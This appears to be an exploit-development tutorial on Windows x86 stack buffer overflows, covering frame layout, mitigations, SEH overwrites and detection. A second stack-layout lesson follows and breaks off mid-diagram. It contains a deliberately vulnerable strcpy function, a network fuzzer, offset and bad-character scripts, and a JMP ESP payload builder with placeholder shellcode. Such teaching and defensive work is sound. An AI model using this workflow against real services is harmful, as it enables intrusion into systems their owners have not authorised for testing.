2. Anatomy of a Stack Frame

A standard cdecl/stdcall function frame is built by the prologue and torn down by the epilogue. Laid out high → low address:

Stack Slot	Description
Function arguments	Pushed by caller before `CALL`
Saved `EIP` (return address)	Pushed implicitly by the `CALL` instruction
Saved `EBP`	Pushed by callee prologue (`PUSH EBP`)
`/GS` stack cookie (if present)	Inserted between locals and saved EBP/EIP
Local variables / buffers	Allocated by `SUB ESP, N`
← `ESP` (stack top)	Grows downward

The prologue and epilogue, with the /GS cookie check shown, look like this:

; --- Prologue ---
push    ebp                 ; save caller frame pointer
mov     ebp, esp            ; establish new frame
sub     esp, 0x40           ; allocate 64 bytes of locals
mov     eax, [__security_cookie]
xor     eax, ebp            ; cookie ^= EBP (frame-tied canary)
mov     [ebp-4], eax        ; store cookie above locals

; --- Epilogue ---
mov     ecx, [ebp-4]
xor     ecx, ebp
call    __security_check_cookie  ; compare vs master; abort on mismatch
mov     esp, ebp
pop     ebp                 ; restore caller frame pointer
ret                         ; pop saved EIP into instruction pointer

Reading this frame live in WinDbg or x64dbg — inspecting ESP, EBP, and the bytes between locals and the saved return address — is the first skill of exploit development.

Figure: A standard x86 cdecl stack frame, ordered from high to low address: function arguments, saved return EIP, saved EBP, /GS cookie, local buffer, ESP. The saved return EIP sits just above the saved EBP, making it the prime overwrite target when a local buffer overflows upward.

3. The Overflow: Why Bounds Checks Matter

The root cause is always the same: a copy operation that writes more bytes into a fixed-size stack buffer than the buffer holds. The classic offenders are CRT functions that perform no bounds checking.

Identifier	What it does
`strcpy`, `strcat`, `gets`, `sprintf`, `scanf`	Unsafe CRT functions with no bounds checking — classic root causes
`memcpy(dst, src, count)`	Copies `count` bytes regardless of `dst` size; dangerous when `count` is attacker-controlled

Here is the canonical vulnerable pattern defenders must recognize in code review:

#include <string.h>

// DELIBERATELY VULNERABLE — lab use only.
void handle_request(char *attacker_input) {
    char buffer[64];            // fixed 64-byte stack buffer
    strcpy(buffer, attacker_input);  // no length check — overflow
}

When attacker_input exceeds 64 bytes, the copy walks past buffer, overwrites the saved EBP, then the saved EIP. Supply a long run of 0x41 ('A') and the program crashes with an access violation as the CPU tries to execute at EIP = 0x41414141. That controlled crash is proof you own the instruction pointer.
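The overwrite order can be modelled without touching a real process. The sketch below treats a /GS- frame as a flat byte array laid out as buffer, saved EBP, saved EIP; the saved values and the function name `simulate_strcpy` are made up for illustration, and the NUL terminator that strcpy appends is ignored.

```python
import struct

BUF_SIZE = 64  # matches char buffer[64] in handle_request

def simulate_strcpy(attacker_input: bytes) -> dict:
    """Model a /GS- frame as [buffer | saved EBP | saved EIP] and copy into it.

    Addresses increase left to right, so an overlong copy runs from the
    buffer into saved EBP and then saved EIP. The saved values are made up.
    """
    frame = bytearray(BUF_SIZE) + struct.pack("<II", 0x0019FF80, 0x00401234)
    data = attacker_input[: len(frame)]      # model only this one frame
    frame[: len(data)] = data                # unchecked copy, like strcpy
    saved_ebp, saved_eip = struct.unpack_from("<II", frame, BUF_SIZE)
    return {"saved_ebp": saved_ebp, "saved_eip": saved_eip}

print({k: hex(v) for k, v in simulate_strcpy(b"A" * 32).items()})  # frame intact
print({k: hex(v) for k, v in simulate_strcpy(b"A" * 72).items()})  # both slots 0x41414141
```

With 68 bytes only the saved EBP is clobbered; it takes the full 72 to replace the return address in this layout.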

When compiled with MSVC /GS- (cookie disabled), the prologue omits the xor/store and the epilogue omits __security_check_cookie entirely — a linear overflow reaches the return address unobstructed. Diffing the /GS vs /GS- disassembly in a debugger is the clearest way to see the cookie.

4. Exploit Development Methodology on Windows

The classic workflow is a tight loop against an intentionally vulnerable target in an isolated VM:

Fuzz to crash — send increasing-length inputs until the service faults.
Find the offset — send a cyclic (de Bruijn) pattern, read the value in EIP at crash, compute the exact distance to the return address.
Confirm EIP control — overwrite with a known marker (0x42424242) and verify.
Enumerate bad characters — find bytes the protocol mangles (\x00, \x0a, \x0d are common).
Find a trampoline — locate JMP ESP in a non-ASLR module.
Build the payload — padding + trampoline address + NOP sled + shellcode.

A minimal network fuzzer:

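import socket, time

target = ("192.168.56.20", 9999)       # lab VM only
size = 100
while size < 4000:
    try:
        # The timeout turns a hung or dead service into an exception instead of a stall.
        with socket.create_connection(target, timeout=5) as s:
            s.sendall(b"TRUN /.:/" + b"A" * size)     # protocol prefix + payload
        print(f"[+] sent {size} bytes")
        size += 200
        time.sleep(1)
    except OSError:
        # The connection failed, so the previous input most likely killed the service.
        print(f"[!] crashed at ~{size} bytes")
        break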

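Offset discovery with a cyclic pattern (generated by pwntools or !mona pattern_create). Generate the pattern and look up the offset with the same tool: pwntools uses a lowercase de Bruijn sequence, while mona produces a Metasploit-style pattern, and a value from one will not be found in the other.

from pwn import cyclic, cyclic_find

pattern = cyclic(3000)                 # de Bruijn sequence, default lowercase alphabet
# ... send pattern, then read EIP from the debugger at crash ...
eip_at_crash = 0x61616174              # example only (bytes "taaa"); substitute your value
offset = cyclic_find(eip_at_crash)     # exact bytes before saved EIP (76 for this example)
print(f"[+] EIP offset = {offset}")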
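When pwntools is not installed, the idea can be reproduced with the standard library. This is a sketch of the textbook de Bruijn construction, not pwntools' own implementation; `de_bruijn` and `pattern_offset` are illustrative names.

```python
import string

def de_bruijn(alphabet: bytes, n: int) -> bytes:
    """Return the full de Bruijn sequence B(k, n) over `alphabet`.

    Every n-byte window occurs exactly once, which is what lets the value
    found in EIP map back to a single offset.
    """
    k = len(alphabet)
    a = [0] * (k * n)
    out = bytearray()

    def db(t: int, p: int) -> None:
        if t > n:
            if n % p == 0:
                out.extend(alphabet[i] for i in a[1 : p + 1])
        else:
            a[t] = a[t - p]
            db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                db(t + 1, t)

    db(1, 1)
    return bytes(out)

def pattern_offset(pattern: bytes, eip_value: int) -> int:
    """Offset of the 4 bytes that ended up in EIP (little-endian), or -1."""
    return pattern.find(eip_value.to_bytes(4, "little"))

pattern = de_bruijn(string.ascii_lowercase.encode(), 4)[:3000]
print(pattern[:16])                         # b'aaaabaaacaaadaaa'
print(pattern_offset(pattern, 0x61616174))  # 76 (bytes "taaa")
```

A return value of -1 usually means the pattern in EIP came from a different generator or was mangled by a bad character on the way in.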

Bad-character enumeration sends the full byte range and diffs it against memory:

badchar_test = bytes(range(1, 256))   # 0x01..0xff; \x00 is assumed bad and left out
# Send, then in the debugger: db esp  -> compare bytes in memory
# Any byte missing/truncated is a bad char; rebuild excluding it.
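The compare-and-rebuild loop can be sketched as follows. `deliver` is a hypothetical callable standing in for "send the bytes, then read them back from memory in the debugger", and `toy_target` is an invented stand-in for a protocol that truncates at a newline and rewrites carriage returns.

```python
def first_bad_char(sent: bytes, observed: bytes):
    """Return (index, byte) of the first sent byte that did not arrive intact.

    `observed` is what the debugger shows at the start of the buffer.
    Returns None when every sent byte is present and unchanged.
    """
    for i, expected in enumerate(sent):
        if i >= len(observed) or observed[i] != expected:
            return i, expected
    return None

def enumerate_bad_chars(deliver, candidates: bytes = bytes(range(1, 256))):
    """Repeat send-and-compare, dropping one bad byte per round."""
    bad = []
    while (hit := first_bad_char(candidates, deliver(candidates))) is not None:
        bad.append(hit[1])
        candidates = bytes(b for b in candidates if b != hit[1])
    return bad

def toy_target(data: bytes) -> bytes:
    """Invented protocol: truncates at \\n and rewrites \\r as a space."""
    return data.split(b"\n")[0].replace(b"\r", b" ")

print([hex(b) for b in enumerate_bad_chars(toy_target)])  # ['0xa', '0xd']
```

Removing one byte per round matters because a truncating bad character hides everything after it; later bad characters only become visible once the earlier one is gone.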

The final builder assembles the pieces. Note the placeholder shellcode — generate benign calc-popping shellcode with msfvenom in your own lab; never embed working shellcode in a tutorial:

from pwn import p32

offset    = 2003
jmp_esp   = 0x625011AF          # FF E4 in a non-ASLR module
nop_sled  = b"\x90" * 16
# shellcode = b"[MSFVENOM_OUTPUT_HERE]"  # generated in your lab, -b "\x00\x0a\x0d"
shellcode = b"\x90" * 32         # placeholder

payload = b"A" * offset + p32(jmp_esp) + nop_sled + shellcode

The key opcodes you search modules for:

Opcode bytes	Instruction	Use
`FF E4`	`JMP ESP`	Classic return trampoline
`FF D4`	`CALL ESP`	Equivalent effect
`FF E5`	`JMP EBP`	When EBP points near the buffer
`EB 06`	Short JMP +6	Next-SEH jump-over gadget

Once RET has popped the overwritten return address, ESP points at the bytes immediately after it, which the attacker also controls. Returning into JMP ESP therefore pivots execution straight into the NOP sled and shellcode.
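A rough sketch of what a trampoline search does under the hood: scan a module's bytes for an opcode and discard any address whose packed form contains a bad character. The function name, the synthetic image, and the base address are assumptions for illustration; a real search (for example with mona) also has to check that the page is executable and that the module is not rebased.

```python
def find_opcode(image: bytes, base: int, opcode: bytes,
                bad_chars: bytes = b"\x00\x0a\x0d"):
    """Yield addresses of `opcode` in `image` whose packed form avoids bad chars."""
    start = 0
    while (idx := image.find(opcode, start)) != -1:
        address = base + idx
        packed = address.to_bytes(4, "little")
        if not any(b in bad_chars for b in packed):
            yield address
        start = idx + 1

# Synthetic 512-byte "module" with two FF E4 (JMP ESP) sequences planted in it.
image = bytearray(0x200)
image[0x00A:0x00C] = b"\xff\xe4"   # lands at 0x6250100A, which contains \x0a
image[0x1AF:0x1B1] = b"\xff\xe4"   # lands at 0x625011AF, which is clean

hits = list(find_opcode(bytes(image), 0x62501000, b"\xff\xe4"))
print([hex(a) for a in hits])      # ['0x625011af']
```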

Figure: The six-step Windows stack overflow exploit development loop, from fuzzing through payload construction. It progresses from controlled crash to precise EIP hijack, ending in a JMP ESP trampoline payload that pivots into a NOP sled and shellcode.

5. Windows Mitigations Deep-Dive

Modern Windows defaults make the naïve attack above fail. Each mitigation targets a different stage.

Mitigation	Mechanism	Bypass vector (teaching)
`/GS` (stack cookie)	Random DWORD cookie between locals and saved EBP/EIP; checked in epilogue	SEH overwrite before the cookie check; cookie leak
SafeSEH	PE table of valid SEH handlers; the exception dispatcher validates the handler against it before calling it	Trampoline in a module not compiled `/SAFESEH`
SEHOP	Validates the SEH chain reaches `FinalExceptionHandler` at dispatch	Chain spoofing; non-opted-in modules
DEP/NX (`/NXCOMPAT`)	Data pages such as the stack and heap are marked non-executable	ROP chain (follow-on topic)
ASLR (`/DYNAMICBASE`)	Randomizes image/stack/heap base	Partial overwrites, info leaks (follow-on topic)

/GS computes a program-wide master cookie at startup via __security_init_cookie(), stored in the module’s .data section. The prologue copies it onto the stack between the locals and the saved frame pointer; the epilogue runs __security_check_cookie(), which calls __report_gsfailure() on mismatch. Microsoft shipped /GS in Visual Studio 2003 and enabled it by default in 2005. Variable reordering moves arrays and structs to the highest part of the frame so a linear overflow cannot clobber other locals before reaching the cookie.

The original /GS only protected arrays of 8+ elements with element size 1 or 2; the later GS++ expanded coverage to any array and any struct regardless of size. The critical limitation: /GS does not protect exception handler records. DEP and ASLR are not stack-specific — they do not stop the overflow or the EIP hijack; they make running shellcode far harder.
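The cookie arithmetic from the prologue and epilogue can be modelled in a few lines. This is a sketch of the x86 scheme described above (master cookie XOR frame pointer), with an invented `GsFailure` exception standing in for `__report_gsfailure()` terminating the process.

```python
import secrets

MASK32 = 0xFFFFFFFF

class GsFailure(Exception):
    """Stands in for __report_gsfailure terminating the process."""

def prologue_cookie(master_cookie: int, ebp: int) -> int:
    """Value the prologue stores at [ebp-4]: master cookie XOR frame pointer."""
    return (master_cookie ^ ebp) & MASK32

def epilogue_check(stored: int, master_cookie: int, ebp: int) -> None:
    """Undo the XOR and compare with the master cookie, as the epilogue does."""
    if ((stored ^ ebp) & MASK32) != master_cookie:
        raise GsFailure("stack cookie mismatch")

master = secrets.randbits(32)      # stands in for __security_cookie
ebp = 0x0019FF70                   # made-up frame pointer
slot = prologue_cookie(master, ebp)

epilogue_check(slot, master, ebp)  # intact frame: returns quietly
try:
    epilogue_check(0x41414141, master, ebp)  # slot overwritten by the overflow
except GsFailure as exc:
    print("terminated:", exc)
```

Because the stored value depends on both a per-process secret and the frame pointer, an attacker who cannot read memory has to guess 32 bits to pass the check, which is why the practical bypasses avoid the epilogue instead.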

Figure: Windows stack overflow mitigations (GS cookie, SafeSEH, SEHOP, DEP, ASLR) grouped by build-time versus OS-level origin. Windows layers build-time mitigations (/GS, SafeSEH) with OS-level controls (SEHOP, DEP, ASLR), and each targets a distinct stage of the exploit chain.

6. SEH-Based Overflow (x86)

On x86, Structured Exception Handling chains live on the stack as linked EXCEPTION_REGISTRATION_RECORD nodes:

typedef struct _EXCEPTION_REGISTRATION_RECORD {
    struct _EXCEPTION_REGISTRATION_RECORD *Next;   // next handler in chain
    PEXCEPTION_ROUTINE                     Handler; // SE handler function ptr
} EXCEPTION_REGISTRATION_RECORD, *PEXCEPTION_REGISTRATION_RECORD;

When a function uses try/except, this record sits on the stack beside the /GS cookie. If the attacker overflows far enough to overwrite both Next SEH and SE Handler, then triggers an exception before the epilogue runs __security_check_cookie(), the OS dispatches to the attacker-controlled handler — bypassing the cookie entirely.

The standard technique overwrites SE Handler with the address of a POP–POP–RET gadget inside a loaded module. At dispatch, the stack arrangement places a pointer to the Next SEH field where RET lands; POP–POP–RET unwinds two slots and returns into the attacker’s Next SEH value, which is typically a short jump (EB 06) over the handler bytes into the shellcode.
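The reason the short jump is `EB 06` comes down to simple arithmetic on the record layout. The sketch below decodes a short JMP and checks where it lands; the record address is made up and `short_jmp_target` is an illustrative helper.

```python
def short_jmp_target(instr_addr: int, instr: bytes) -> int:
    """Decode an x86 short JMP (EB rel8) and return the address it lands on.

    rel8 is a signed displacement measured from the end of the 2-byte
    instruction.
    """
    if len(instr) < 2 or instr[0] != 0xEB:
        raise ValueError("not a short JMP")
    rel8 = int.from_bytes(instr[1:2], "little", signed=True)
    return (instr_addr + 2 + rel8) & 0xFFFFFFFF

# Made-up record address; the layout is Next (4 bytes) then Handler (4 bytes).
next_seh_addr = 0x0019FFC4
handler_addr = next_seh_addr + 4
after_record = handler_addr + 4

target = short_jmp_target(next_seh_addr, b"\xeb\x06\x90\x90")
print(hex(target), target == after_record)   # 0x19ffcc True
```

The jump itself occupies two bytes of the four-byte Next field, so skipping six more bytes clears the two padding bytes and the four handler bytes, landing on the first byte after the record.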

SafeSEH breaks this by validating the handler against the PE’s registered-handler table; attackers respond by sourcing the gadget from a module not built with /SAFESEH. SEHOP (introduced in Windows Vista SP1 and Server 2008; on by default on the Server editions but off by default on Vista and Windows 7 clients) walks the chain to confirm it terminates at FinalExceptionHandler, defeating a naively overwritten chain. On 64-bit, exception data is table-based and no longer stored on the stack, so this primitive does not apply.
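The chain walk can be pictured with a simplified model. The sketch below is an assumption-laden approximation of the idea (alignment, in-stack, no loops, terminates at the final handler), not the actual ntdll logic; the `FINAL_HANDLER` address and the `records` dictionary standing in for stack memory are invented.

```python
FINAL_HANDLER = 0x77A0B000   # made-up stand-in for ntdll!FinalExceptionHandler
END_OF_CHAIN = 0xFFFFFFFF

def chain_is_valid(records: dict, head: int, stack_lo: int, stack_hi: int) -> bool:
    """Walk Next pointers and require the chain to end at the final handler.

    `records` maps a record address to (next, handler), standing in for
    reads of thread stack memory.
    """
    seen = set()
    addr = head
    while True:
        # Each record must be 4-byte aligned, inside the stack, and not revisited.
        if addr % 4 or not (stack_lo <= addr < stack_hi) or addr in seen:
            return False
        if addr not in records:
            return False
        seen.add(addr)
        nxt, handler = records[addr]
        if nxt == END_OF_CHAIN:
            return handler == FINAL_HANDLER
        addr = nxt

STACK = (0x0019F000, 0x001A0000)
intact = {0x0019FF00: (0x0019FF80, 0x00401000),
          0x0019FF80: (END_OF_CHAIN, FINAL_HANDLER)}
# After the overflow, Next holds the short-jump bytes EB 06 90 90.
smashed = {0x0019FF00: (0x909006EB, 0x625010B4),
           0x0019FF80: (END_OF_CHAIN, FINAL_HANDLER)}

print(chain_is_valid(intact, 0x0019FF00, *STACK))    # True
print(chain_is_valid(smashed, 0x0019FF00, *STACK))   # False
```

The smashed chain fails because the Next field now holds instruction bytes rather than a pointer, which is exactly the property of the classic overwrite that this check exploits.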

Figure: The SEH-based stack overflow attack chain: buffer overflow, exception dispatch, POP–POP–RET gadget, and short jump into shellcode. Overwriting the SEH record and triggering an exception before the /GS epilogue runs lets attackers bypass the stack cookie entirely via a POP–POP–RET trampoline.

7. Lab Walkthrough: Exploiting an Intentionally Vulnerable Binary

Perform every step against a purpose-built target — VulnServer, brainpan, or a custom binary compiled with /GS- — inside an isolated VM with no network access to production. The two-phase approach makes the mitigations tangible:

No-protections build: Compile with /GS- /NXCOMPAT:NO /DYNAMICBASE:NO. Run the fuzzer (§4), crash the service, find the offset with a cyclic pattern, confirm EIP control, enumerate bad chars, locate JMP ESP with mona.py, and land in a NOP sled.
/GS-only build: Recompile with /GS enabled, replay the same payload, and watch __security_check_cookie detect the corrupted canary and terminate the process via __report_gsfailure() — the same input that worked now dies in the epilogue.

Reference debugger and mona.py commands:

0:000> g                      ; run until crash
0:000> r                      ; read registers — expect EIP = 41414141
0:000> d esp                  ; dump stack at ESP — find your buffer
0:000> !exploitable           ; triage the crash classification
0:000> bp 0x625011AF          ; break on the JMP ESP trampoline

!mona findmsp                          ; locate a Metasploit-style cyclic pattern (!mona pattern_create), report EIP offset
!mona jmp -r esp -cpb "\x00\x0a\x0d"   ; find JMP ESP excluding bad chars
!mona bytearray -cpb "\x00"            ; generate byte array for badchar diffing

8. Common Attacker Techniques

Technique	Description
Linear stack smash	Overflow a buffer to overwrite saved `EIP` with a `JMP ESP` trampoline
SEH overwrite	Overwrite `Next SEH` + `SE Handler`, trigger an exception to bypass `/GS`
Non-SafeSEH trampoline	Source POP–POP–RET / `JMP ESP` gadgets from modules lacking `/SAFESEH`
Bad-char-safe encoding	Encode shellcode to avoid protocol-mangled bytes (`\x00`, `\x0a`, `\x0d`)
Egghunter / staging	Use a small first-stage to locate or download a larger payload
Post-exploit `VirtualProtect`	Call `VirtualProtect`, typically from a ROP chain, to mark injected memory executable and bypass DEP

In practice the attacker chains these: a SEH overwrite defeats the cookie, a non-SafeSEH gadget defeats SafeSEH, and a ROP stub built from non-ASLR module gadgets defeats DEP before transferring to shellcode.

9. Defensive Strategies & Detection

Sysmon does not emit a “buffer overflow” event. The crash surfaces through Windows Error Reporting, and the post-exploitation behavior surfaces through Sysmon.

WER Event ID 1000 (Application Error, Application log): logs the faulting module, ExceptionCode = 0xC0000005 (access violation), faulting offset, and thread ID. A 0xC0000005 at an implausible faulting offset (for example, one that matches a fill pattern such as 0x41414141) in a network-facing service is a high-fidelity signal.
WER Event ID 1001: records the crash bucket and any captured dump.

Relevant Sysmon events for follow-on activity:

Event ID	Name	Relevance
`1`	Process Creation	Shells/payloads spawned from a crashed service
`3`	Network Connection	Reverse-shell / C2 egress from shellcode
`7`	Image Loaded	Unexpected `ws2_32.dll` load by a non-network service
`8`	CreateRemoteThread	Thread injection by shellcode
`10`	Process Access	Shellcode calling `OpenProcess` on `lsass.exe`
`11`	File Created	Dropped payloads / second-stage binaries
`25`	Process Tampering	Process hollowing following the overflow

Useful ETW providers: Microsoft-Windows-WER-Diag (crash diagnostics), Microsoft-Windows-Security-Mitigations (WDEG/Exploit Guard triggers, in /KernelMode and /UserMode channels), and Microsoft-Windows-Kernel-Process. Enable Audit Process Creation (4688) with command-line logging and Audit Process Termination (4689) to catch crash/restart loops.

A conceptual Sigma rule keying on repeated crashes of a network-facing service. It uses Sigma's legacy aggregation syntax, and the field names depend on how your pipeline parses Event 1000:

title: Repeated Application Crash on Network-Facing Service
logsource:
  product: windows
  service: application
detection:
  selection:
    EventID: 1000
    Application|contains: 'vulnservice.exe'
    ExceptionCode: '0xc0000005'
  timeframe: 1m
  condition: selection | count() by Application > 3
falsepositives:
  - Legitimate software bugs
level: medium
tags:
  - attack.initial_access
  - attack.t1190
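For pipelines that do not run Sigma, the same threshold logic can be sketched directly. The event dictionaries and their keys (`EventID`, `Application`, `ExceptionCode`, `TimeCreated`) are hypothetical; a real collector will name them differently. Note that this uses a sliding window, which is an assumption and may alert slightly differently from a backend that buckets by fixed intervals.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

def crash_bursts(events, threshold=3, window=timedelta(minutes=1)):
    """Yield (application, timestamp) whenever more than `threshold`
    access-violation crashes of one application fall inside `window`.

    `events` must be sorted by time.
    """
    recent = defaultdict(deque)
    for ev in events:
        if ev["EventID"] != 1000 or ev["ExceptionCode"].lower() != "0xc0000005":
            continue
        q = recent[ev["Application"]]
        q.append(ev["TimeCreated"])
        while ev["TimeCreated"] - q[0] > window:
            q.popleft()                     # drop crashes older than the window
        if len(q) > threshold:
            yield ev["Application"], ev["TimeCreated"]

t0 = datetime(2024, 1, 1, 12, 0, 0)
events = [{"EventID": 1000, "Application": "vulnservice.exe",
           "ExceptionCode": "0xC0000005",
           "TimeCreated": t0 + timedelta(seconds=10 * i)} for i in range(5)]

for app, when in crash_bursts(events):
    print(app, when.time())
```

Five crashes ten seconds apart trip the threshold on the fourth and fifth events; the same five crashes spread over several minutes would not.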

Hardening Steps

Force WDEG / Exploit Protection on network-facing services via Set-ProcessMitigation: mandatory DEP, force-ASLR, SEHOP, and termination on heap corruption.
Build with /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT and audit your pipeline for them.
Verify SEHOP — HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\kernel\DisableExceptionChainValidation = 0.
Forward WER Event ID 1000 to the SIEM and alert on repeated crashes of one process.
Use AddressSanitizer (/fsanitize=address, MSVC ≥ VS 2019 16.9) in dev/test to catch OOB writes.
Rate-limit oversized inputs at the WAF/NGFW; alert on crash surges.
Run services least-privilege so successful exploitation yields minimal access.

10. Tools for Stack Overflow Analysis

Tool	Description	Link
WinDbg	Kernel/user debugger; `!exploitable` crash triage	microsoft.com
x64dbg	User-mode debugger for live frame inspection	x64dbg.com
mona.py	Immunity/WinDbg plugin for offsets, trampolines, bad chars	github.com
pwntools	Python exploit-dev framework (`cyclic`, `p32`)	pwntools.com
ROPgadget	Gadget discovery for DEP-bypass chains	github.com
Ghidra	Static disassembly / decompilation for code review	ghidra-sre.org
Sysmon	Endpoint telemetry for post-exploitation behavior	microsoft.com

11. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Exploit Public-Facing Application	`T1190`	WER `EventID 1000` crash bursts; WAF oversized-input alerts
Exploitation for Privilege Escalation	`T1068`	Service running as SYSTEM crashing then spawning children
Exploitation for Client Execution	`T1203`	Client app (parser/player) crash + child process via Sysmon `EventID 1`
Endpoint DoS: Application Exploitation	`T1499.004`	Repeated crash/restart loops (`4689`, WER `1000`)
Exploit Protection (mitigation)	`M1050`	DEP/ASLR/SEHOP/`/GS` enforced via WDEG telemetry

Stack buffer overflow is a vulnerability primitive, not a standalone ATT&CK technique. T1190 and T1068 are the canonical mappings for the adversarial behavior that uses it.

Summary

A classic stack buffer overflow overwrites the saved return address to hijack EIP and pivot execution into attacker-controlled shellcode via a JMP ESP trampoline.
The x86 frame places locals, an optional /GS cookie, saved EBP, and the return EIP in a predictable order that linear overwrites exploit.
/GS inserts a stack canary checked in the epilogue, but does not protect SEH records — the SEH overwrite is the canonical x86 bypass, in turn countered by SafeSEH and SEHOP.
DEP and ASLR do not stop the overflow itself; they force ROP and info-leak techniques to run shellcode.
Detect via WER Event ID 1000 (0xC0000005) crash bursts plus Sysmon post-exploitation events, and harden with WDEG, /GS /SAFESEH /DYNAMICBASE /NXCOMPAT, SEHOP, and least privilege.

Understanding the Stack: Frames, Prologue/Epilogue, and Stack Layout

Objective: Understand how the call stack is organized in x86 and x64 Windows processes — the mechanics of stack frames, function prologue/epilogue sequences, calling conventions, shadow space, and the exact memory layout a debugger reveals — so you can recognize a healthy stack versus a corrupted one and reason precisely about stack-based exploitation and its defenses.

1. Why the Stack Matters for Exploit Development

The stack is the primary battleground for classic memory-safety bugs. Saved return addresses, saved frame pointers, function arguments, and fixed-size local buffers all live side by side on the same contiguous, downward-growing region. When a write runs past the end of a stack buffer, it corrupts the very control-flow data the CPU will trust on the next RET.

For a defender, the same knowledge is diagnostic. A return address pointing into the stack or heap instead of an executable image, an RSP value that jumped thousands of bytes (a stack pivot), or a frame chain that no longer links cleanly are all signatures of corruption. You cannot recognize an abnormal stack until you have internalized a normal one.

2. The Stack as a Data Structure: Growth Direction and Address Space Layout

A Windows process virtual address space holds the mapped image (.text, .data), loaded DLLs, the heap, thread stacks, and per-thread/per-process control structures (TEB/PEB). Each thread receives its own stack, reserved and committed on demand.

The stack grows downward — toward lower addresses. PUSH decrements the stack pointer; POP increments it. The live top of the stack is always tracked by RSP (x64) / ESP (x86).

Register	Role
`RSP` / `ESP`	Stack pointer — always points to the top (lowest address) of the current frame
`RBP` / `EBP`	Base/frame pointer; anchors the frame on x86. On x64 it is usually free for general use and serves as a frame pointer mainly when the frame size is dynamic (for example, `alloca()`)
`RIP` / `EIP`	Instruction pointer — saved as the return address by `CALL`
`RAX`	Integer/pointer return value (`XMM0` for floating-point)

3. x86 Stack Frames: Registers, Calling Conventions, and the EBP Chain

32-bit Windows supports several co-existing calling conventions, which is why x86 reversing requires you to identify the convention before reading arguments.

Convention	Cleanup	Argument Passing
`__cdecl`	Caller cleans	Right-to-left on stack
`__stdcall`	Callee cleans	Right-to-left on stack (Win32 API)
`__fastcall`	Callee cleans	First two in `ECX`/`EDX`, rest on stack
`__thiscall`	Callee cleans	C++ `this` in `ECX`, args on stack

x86 code conventionally uses EBP as a fixed frame anchor. Every local and argument is addressed relative to it, and each saved EBP points at the caller’s saved EBP, forming a walkable frame chain.

#include <string.h>

// MSVC x86, compiled /Od (no optimization)
void vuln(char *src) {
    char buf[64];      // local buffer: classic overflow target
    strcpy(buf, src);  // no bound: copies until src's NUL terminator
}

; x86 frame for vuln(), high → low address
push ebp            ; save caller's EBP
mov  ebp, esp       ; EBP anchors this frame
sub  esp, 64        ; allocate buf[64]
; ... strcpy ...
; [EBP + 8]  -> arg1 (src)
; [EBP + 4]  -> return address   ← ret-overwrite target
; [EBP + 0]  -> saved EBP        ← frame chain link
; [EBP - 64] -> buf              ← overflow origin

A buffer overflow that walks upward from [EBP-64] crosses the saved EBP, then the return address — the two values the epilogue and RET consume.
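The walkable frame chain can be demonstrated on a captured block of stack bytes. The sketch below follows saved-EBP links and reports each frame's return address; the addresses and the helper name `walk_ebp_chain` are invented for the example.

```python
import struct

def walk_ebp_chain(stack: bytes, stack_base: int, ebp: int, max_frames: int = 32):
    """Follow saved-EBP links through a captured x86 stack region.

    `stack` holds the bytes starting at address `stack_base`. Returns a list
    of (frame_ebp, return_address) pairs, stopping when the chain leaves the
    captured region or stops moving toward higher addresses.
    """
    frames = []
    end = stack_base + len(stack)
    while len(frames) < max_frames and stack_base <= ebp <= end - 8:
        saved_ebp, ret = struct.unpack_from("<II", stack, ebp - stack_base)
        frames.append((ebp, ret))
        if saved_ebp <= ebp:          # a healthy chain only climbs
            break
        ebp = saved_ebp
    return frames

base = 0x0019FF00
mem = bytearray(0x100)
for frame_ebp, saved, ret in [(0x0019FF20, 0x0019FF60, 0x00401050),
                              (0x0019FF60, 0x0019FFA0, 0x00401200),
                              (0x0019FFA0, 0x00000000, 0x77001234)]:
    struct.pack_into("<II", mem, frame_ebp - base, saved, ret)

for frame_ebp, ret in walk_ebp_chain(bytes(mem), base, 0x0019FF20):
    print(hex(frame_ebp), "->", hex(ret))

# Simulate the overflow reaching the first frame's saved EBP and return address.
struct.pack_into("<II", mem, 0x0019FF20 - base, 0x41414141, 0x41414141)
print(walk_ebp_chain(bytes(mem), base, 0x0019FF20))   # chain stops after one frame
```

A chain that ends abruptly at a frame whose saved EBP and return address are both fill bytes is the debugger-side view of the overflow described above.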

Figure: A typical x86 stack frame from higher to lower addresses: function arguments, return address, saved EBP, local variables, and the buffer nearest ESP. Overflowing the buffer at [EBP-N] walks upward through locals, corrupting saved EBP and then the return address.

4. x64 Stack Frames: The Windows ABI and Shadow Space

The Windows x64 ABI consolidates every x86 convention into a single calling convention. The first four integer or pointer parameters pass in RCX, RDX, R8, R9; the first four floating-point parameters in XMM0–XMM3. Additional arguments spill onto the stack.

Two rules dominate the x64 layout:

Shadow space (home space): The caller allocates 32 bytes immediately above the return address, regardless of how many parameters are actually used. The callee may dump RCX/RDX/R8/R9 into this home space if it needs to spill them.
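16-byte alignment: RSP must be 16-byte aligned immediately before a CALL. Because CALL pushes an 8-byte return address, RSP is 16n-aligned at the call site and 16n+8 on entry to the callee, which is why a prologue that pushes no registers typically subtracts an odd multiple of 8 (for example 0x28).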

Critically, x64 functions typically address locals and arguments RSP-relative, leaving RSP constant for the body of the function. RBP is freed for general use unless alloca() is present.
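The two rules combine into a small calculation for the stack allocation a prologue needs. This is a sketch under the assumption that the function reserves shadow space for its own callees and keeps RSP aligned for them; `frame_allocation` is an illustrative helper, not something a compiler exposes.

```python
SHADOW_SPACE = 32   # home space for RCX, RDX, R8, R9
RET_ADDR = 8        # pushed by CALL before the callee's prologue runs

def frame_allocation(local_bytes: int, pushed_regs: int = 0) -> int:
    """Smallest `sub rsp, N` that leaves RSP 16-byte aligned for further calls.

    On entry RSP is 16n+8 (aligned before CALL, then 8 bytes pushed). Each
    pushed non-volatile register moves it another 8 bytes.
    """
    needed = SHADOW_SPACE + local_bytes
    misalign = (RET_ADDR + 8 * pushed_regs + needed) % 16
    return needed + (16 - misalign) % 16

print(hex(frame_allocation(0)))      # 0x28
print(hex(frame_allocation(8)))      # 0x28
print(hex(frame_allocation(16)))     # 0x38
print(hex(frame_allocation(0, 1)))   # 0x20
```

The first result is the familiar `sub rsp, 0x28`: 32 bytes of shadow space plus 8 bytes of padding to undo the misalignment introduced by the return address.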

[High address — caller's frame]
  Stack arg 5+      ← [RSP + 0x28+]
  Shadow [R9]       ← [RSP + 0x20]
  Shadow [R8]       ← [RSP + 0x18]
  Shadow [RDX]      ← [RSP + 0x10]
